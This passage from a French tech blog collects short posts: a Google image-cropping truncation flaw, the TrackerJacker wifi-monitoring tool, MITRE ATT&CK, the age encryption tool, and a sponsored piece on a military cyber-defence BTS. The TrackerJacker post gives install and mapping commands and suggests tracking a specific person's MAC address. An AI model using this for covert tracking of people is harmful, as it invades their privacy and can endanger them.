Cette vulnérabilité est due à un problème d’API chez Google, où c’est l’option « w » (écriture) qui a été utilisée à la place de « wt » (écriture avec troncage). Par conséquent, l’image d’origine n’est pas tronquée lorsqu’elle est recadrée.
Bref, si la fonction « recadrage » que vous utilisez dans votre logiciel préféré passe par l’API de Google, soyez vigilant, le temps que ce problème soit corrigé.
Vous êtes en ville et autour de vous, ça crépite de réseaux wifi en tous genres ! Et bien bonne nouvelle, vous allez pouvoir analyser et cartographier tout ça comme vous le feriez avec un nmap. Sauf qu’il n’y a pas besoin de se connecter à ces réseaux wifi ni même que ces derniers diffusent un SSID.
L’outil qui permet cet exploit s’appelle TrackerJacker. C’est un outil en ligne de commande qui permet tout simplement de faire du monitoring 802.11 sous Linux (Raspberry Pi aussi) et macOS.
Ça permet comme ça d’avoir non seulement une liste des réseaux wifi, mais également de tous les appareils qui y sont connectés. Sur votre propre réseau wifi, ça peut vous permettre également de trouver l’appareil qui pompe toute la bande passante.
Pour l’installer :
pip3 install trackerjacker
Vous pouvez également traquer certaines adresses MAC si besoin et ensuite déclencher des alertes ou toute sorte de scripts. Imaginez, vous avez l’adresse MAC de quelqu’un qui doit rester loin de vous… Et bien vous pouvez instantanément savoir s’il est dans le coin dès qu’il se connecte à un réseau wifi autour de vous :-).
Pour cartographier tout ce qui est autour de vous, vous pouvez également utiliser la commande suivante en spécifiant l’interface réseau à utiliser (ici eth0) :
trackerjacker -i eth0 --map
Vous récupérerez alors un fichier YAML nommé wifi_map.yaml.
Bref, un bon petit outil développé en Python à tester. Toute la doc est dispo sur Github.
Ce matin, on va causer cybersécurité avec un outil vraiment cool qui pourrait aider à protéger vos réseaux contre les menaces avancées : ATT&CK.
ATT&CK a été créé par le MITRE en 2013 pour documenter les tactiques, techniques et procédures (TTP) couramment utilisées par les menaces persistantes avancées contre les réseaux d’entreprise Windows. Mais ce n’est pas juste une liste d’outils et de logiciels malveillants utilisés par les attaquants puisque ATT&CK se concentre surtout sur la façon dont ces acteurs interagissent avec les systèmes lors d’une opération.
Le site organise ces TTP dans une matrice pour aider à fournir un contexte à chaque technique employée par des cyberattaquants. Par exemple, la tactique « Persistence » représente l’objectif de l’attaquant qui est de se maintenir dans l’environnement cible. Cette tactique est ainsi associée à plusieurs autres techniques pour qu’elle soit efficace, selon le système visé.
Cette matrice est probablement l’aspect le plus connu de cette base de connaissance car elle est souvent utilisée pour montrer la surface de défense d’un environnement, les capacités de détection des produits de sécurité et les résultats d’un incident ou d’une simulation d’attaques.
Mais ATT&CK va encore plus loin puisqu’il intègre des informations de renseignement sur les menaces pour permettre une meilleure compréhension des comportements des groupes d’attaquants. Les analystes peuvent ainsi se concentrer sur les techniques les plus couramment utilisées par des groupes spécifiques, telles que le célèbre groupe APT29, et comprendre comment ces groupes les utilisent.
Alors, qu’est-ce que cela signifie concrètement pour vous ?
Eh bien, si vous bossez dans la cybersécurité, vous pouvez utiliser ATT&CK pour améliorer votre défense contre les menaces avancées en identifiant les TTP couramment utilisées par les attaquants et en vous assurant que vos défenses couvrent ces vecteurs d’attaque. Vous pouvez également utiliser ATT&CK pour tester vos défenses en simulant des attaques qui utilisent des TTP spécifiques et en mesurant votre capacité à les détecter.
Il s’agit d’un outil super utile pour aider à protéger les systèmes contre les menaces avancées. Il est gratuit et accessible à tous !
Aujourd’hui, j’aimerais vous présenter un outil de chiffrement simple d’utilisation, sécurisé avec des clés « explicites » et sans configuration.
Son nom c’est Age et il est également disponible sous la forme d’une lib Go.
Pour l’installer sous macOS :
brew install age
Pour l’installer sous Ubuntu :
apt install age
Pour l’installer sous Windows :
scoop bucket add extras; scoop install age
Des binaires pour Windows, Linux, macOS et FreeBSD sont également disponibles sur la page Github. Pour générer une nouvelle clé de chiffrement, vous pouvez procéder comme ceci :
age-keygen -o key.txt
Celle-ci sera stockée dans key.txt. Ensuite, vous pourrez l’utiliser pour chiffrer un fichier comme ceci :
age --encrypt -i key.txt -o fichier.age fichier.txt
Ou directement avec la clé avec le paramètre -r . Dans l’exemple ci-dessous, je vous montre également qu’on peut chiffrer des fichiers qui seraient le résultat d’une commande (ici une création d’archive tar) :
tar cvz ~/data | age -r age1ql3z7hjy54pw3hyww5ayyfg7zqgvc7w3j2elw8zmrj2kg5sfn9aqmcac8p > data.tar.gz.age
Et pour déchiffrer ce fichier :
age --decrypt -i key.txt fichier.age > fichier.txt
Et vous pouvez également spécifier plusieurs clés pour tous vos destinataires.
age -o example.jpg.age -r age1ql3z7hjy54pw3hyww5ayyfg7zqgvc7w3j2elw8zmrj2kg5sfn9aqmcac8p \
-r age1lggyhqrw2nlhcxprm67z43rta597azn8gknawjehu9d9dl0jq3yqqvfafg example.jpg
Vous pouvez également demander la création d’une phrase de passe avec le paramètre -p.
age -p fichier.txt > fichier.txt.age
L’outil vous demandera alors de saisir une phrase de passe ou la générera pour vous.
Vous l’aurez compris, pas de clé privée. Juste une grosse clé (publique) qui sert à la fois pour le chiffrement et le déchiffrement. Rassurez-vous, age prend également en charge le chiffrement à partir de clés publiques SSH ssh-rsa et ssh-ed25519, et le déchiffrement se fait avec la clé privée correspondante. Pour chiffrer :
age -R ~/.ssh/id_ed25519.pub exemple.jpg > exemple.jpg.age
Pour déchiffrer :
age -d -i ~/.ssh/id_ed25519 exemple.jpg.age > exemple.jpg
Attention cela dit, la prise en charge des clés SSH utilise une cryptographie plus complexe et incorpore une balise de clé publique dans le fichier chiffré, ce qui permet de suivre les fichiers chiffrés avec cette clé spécifique.
— Article en partenariat avec le Ministère des Armées —
Vous ne le savez peut-être pas, mais après le bac, j’ai fait un BTS en alternance et c’était vraiment un rêve devenu réalité, car je pouvais enfin bidouiller toute la journée sur des ordinateurs sans aucune modération, aussi bien à l’école que dans l’entreprise qui m’a pris en alternance. Évidemment déjà à l’époque, je m’intéressais beaucoup à la cybersécurité, mais à ma connaissance, il n’y avait aucune école spécialisée sur ce sujet.
Heureusement, ça a bien changé, car maintenant, les passionnés de cybersécurité ont l’embarras du choix au niveau des écoles qui forment à des métiers « cyber ».
Maintenant, la cybersécurité est partout dans notre vie quotidienne et les menaces en ligne (dont je vous parle régulièrement) sont nombreuses. Cela peut provoquer des catastrophes humaines, mais également économiques et c’est aussi un terrain d’affrontement pour les armées du monde entier.
C’est pour ça que j’aimerai vous présenter le BTS Cyber-Défense de Saint Cyr qui est une formation assez unique en son genre puisqu’elle a été lancée en 2017 sur l’initiative de l’Armée de Terre et des services spécialisés du Ministère des Armées. Il s’agit avant tout de répondre aux besoins de recrutement de l’armée en matière de cybersécurité. C’est un peu comme si l’armée vous disait : « Vous aimez la cybersécurité ? Alors, venez nous aider à protéger notre pays ! ».
Je suis sûr que si vous êtes encore au lycée, en sortie de Bac STI2D, Bac Scientifique ou Bac Pro SN, ça peut vous intéresser. Il s’agit d’un BTS CIEL (Cybersécurité, Informatique et réseaux, Électronique, anciennement BTS SNIR) reprenant en totalité le programme officiel de l’Éducation Nationale, sauf qu’en plus, ils y ont rajouté des spécificités propres au Ministère des Armées.
Ce BTS Cyber-Défense de Saint Cyr va bien au-delà d’une simple formation de 2 ans après le bac : c’est carrément une nouvelle vie qui s’offre à ceux qui choisiront cette voie puisqu’un contrat d’engagement est signé avec le Ministère. Vous serez logé (c’est de l’internat), nourri et blanchi avec un peu d’argent de poche et en 2 ans, vous obtiendrez un niveau opérationnel se rapprochant de celui de quelqu’un qui aurait fait une licence. Vous l’aurez compris, c’est une formation intense.
Et en sortie, lorsque vous réussirez votre diplôme, un emploi vous sera proposé (et il sera obligatoire), soit en tant que civil pour rejoindre les services spécialisés du Ministère des Armées (Commandement des systèmes d’information, cyberdéfense, renseignement), soit en tant que militaire, c’est-à-dire que vous intégrerez un régiment quelque part en France. Vous suivrez alors une formation complémentaire spécifique, soit à l’École des Transmissions, soit au sein du service pour lequel vous travaillerez. Et si vous voulez continuer les études, et bien c’est toujours possible et même encouragé, mais uniquement en cours à distance / cours du soir.
C’est ouvert à toutes les personnes de nationalité française et vous n’avez pas nécessairement besoin d’avoir des connaissances en informatique à l’entrée. Il faut juste être motivé, exigeant avec soi-même et avoir une très bonne capacité de travail. Et surtout, vous l’aurez compris, être bien motivé pour travailler au Ministère des Armées. Notez que les admissions dans cette formation sont également ouvertes aux candidats en réorientation après une première année d’études dans un domaine scientifique ou technique.
Alors y’a quoi exactement dans cette formation de 40h de cours par semaine ?
Et bien évidemment, vous aurez des cours de cybersécurité (connaissance du milieu, défense et attaque) à hauteur de 4h par semaine, des cours d’anglais (4h par semaine au total) avec le passage du TOEIC, histoire d’être au point. Il y a également 4h de sport par semaine donc c’est mieux si vous êtes en bonne condition physique. Et également une préparation militaire supérieure. Ça veut dire que vous allez tout apprendre sur la chose militaire, de la reconnaissance des grades au maniement des armes en passant par une formation de commandement.
Hé oui, c’est indispensable puisqu’après, ceux qui choisiront la voie militaire pourront se retrouver en train de taper des lignes de commande dans un shell lors d’une opération dans un pays étranger. Bref, un boulot de technicien supérieur dans des conditions de travail exceptionnelles, des moyens uniques avec des missions que vous ne pourriez jamais réaliser dans une entreprise classique, comme de la lutte informatique réellement offensive.
Voici un peu à quoi ressemble le quotidien d’une personne qui a suivi ce cursus au sein de l’armée :
Des travaux pratiques sont également donnés par des employeurs militaires et civils, ce qui vous permettra d’être bien dans le bain avec la réalité du terrain et en fin de première année, vous effectuerez 5 semaines de stage au Ministère des Armées, histoire de parfaire encore plus votre formation en vous confrontant aux réalités du métier.
Ce qui est cool également avec cette formation, c’est que tout est teinté cybersécurité, y compris les cours plus traditionnels d’informatique, et que les profs sont tous issus du monde professionnel, avec pour certains, une expérience dans le secteur de la défense. Donc si vous aimez la cybersécurité et votre pays, je pense que c’est une voie intéressante à envisager, avec tous les avantages d’une carrière militaire (qui a dit la retraite ? );-))
Si ça vous chauffe, vous pouvez faire votre demande sur ParcourSup en cliquant ici. Depuis son ouverture en 2017, cette formation affiche un taux de réussite de 100% à l’examen final.
